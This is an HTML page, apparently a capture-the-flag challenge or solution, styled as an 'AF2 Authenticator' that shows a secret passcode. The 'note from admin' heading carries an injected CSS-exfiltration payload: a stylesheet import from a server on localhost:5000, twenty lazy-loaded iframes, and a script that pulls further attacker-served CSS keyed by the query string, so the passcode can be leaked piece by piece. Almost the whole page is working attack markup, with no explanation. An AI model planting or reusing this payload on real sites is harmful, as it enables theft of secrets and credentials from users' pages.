<html>
	<head>
		<title>AF2 Authenticator</title>
		<style>
			body {
				background-color: #1b2233;
				font-family: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helvetica Neue",Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol";
				color: white;
			}

			h2 {
			    text-align: center;
			    font-size: 20px;
			    margin-bottom: .5rem;
			    font-family: inherit;
			    font-weight: 500;
			    line-height: 1.2;
			    color: inherit;
			}

			h1 {
				margin-top: 100px;
			    text-align: center;
			    font-size: 28px;
			    margin-bottom: .5rem;
			    font-family: inherit;
			    font-weight: 500;
			    line-height: 1.2;
			    color: inherit;
			}
			a {
				color: blue;
			}
			a:visited {
				color: green;
			}
		</style>
	</head>
	<body>
		<h1>passcode: 5377254231546543</h1>
		<h2> A note from admin: 
			<style>
				@import url('http://localhost:5000/static/init.css');
			</style>
			<div class="gap"></div>
			<div class="container">
				<iframe class="f0" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="s0" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="f1" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="s1" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="f2" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="s2" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="f3" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="s3" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="f4" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="s4" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="f5" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="s5" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="f6" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="s6" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="f7" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="s7" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="f8" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="s8" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="f9" src="/static/index.html" loading="lazy"></iframe>
				<iframe class="s9" src="/static/index.html" loading="lazy"></iframe>
			</div>
		</h2>
		<script>
			function main () {
				const container = document.querySelector('.container')
				const mg = window.location.search.slice(1)
				const style = document.createElement('style')
				style.innerText = '@import url("http://localhost:5000/api/manager.css?id=' + mg + '");'
				container.appendChild(style)
			}

			window.addEventListener('load', main)
		</script>
	</body>
</html>
